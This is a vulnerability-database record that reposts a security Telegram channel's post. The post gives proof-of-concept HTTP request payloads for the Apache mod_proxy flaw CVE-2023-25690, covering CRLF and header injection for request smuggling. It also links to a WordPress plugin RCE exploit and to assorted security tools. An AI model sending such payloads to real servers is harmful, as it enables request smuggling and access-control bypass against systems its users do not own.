{"uuid": "22a4b0a7-eeb3-4031-a608-fe97048ca5ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3181", "content": "Hackers Factory \n\n[PoC] [CVE-2023-25690] Apache HTTP Server mod_proxy vul\n\nCLRF Injection\nGET /categories/1%20HTTP/1.1%0d%0aFoo:%20baarr HTTP/1.1\nHost: \n\nHeader Injection\nGET /categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1\nHost: 1.1.1.1\n\nhttps://github.com/dhmosfunk/CVE-2023-25690-POC\n\nCVE-2023-4634\n\nRCE Exploit for Wordpress Plugin Media-Library Plugin &lt; 3.10 (CVE-2023-4634)\n\nhttps://github.com/Patrowl/CVE-2023-4634\n\nA cross-platform command-line interface (CLI) tool that allows you to use ChatGPT 3.5 in your Terminal without requiring API keys.\n\ngithub.com/aandrew-me/tgpt\n\nexamples of using radius2 to solve reversing challenges\n\nhttps://github.com/aemmitt-ns/radius2-examples\n\nRun Capture the Flags and Security Trainings with OWASP WrongSecrets\n\nhttps://github.com/OWASP/wrongsecrets-ctf-party\n\nAvred is being used to identify which parts of a file are identified by a Antivirus, and tries to show as much possible information and context about each match.\n\ngithub.com/dobin/avred\n\nWeb:\navred.r00ted.ch\n\nA Pin Tool for tracing API calls etc\n\nhttps://github.com/hasherezade/tiny_tracer\n\nAn open-source self-hosted purple team management web application.\n\nhttps://github.com/CyberCX-STA/PurpleOps\n\nEvolutionary encryption framework based on scalable complexity over time.\n\ngithub.com/jofpin/temcrypt\n\n#infosec #cybersecurity #hackersfactory \n\nhttps://t.me/dilagrafie", "creation_timestamp": "2023-09-07T07:54:50.000000Z"}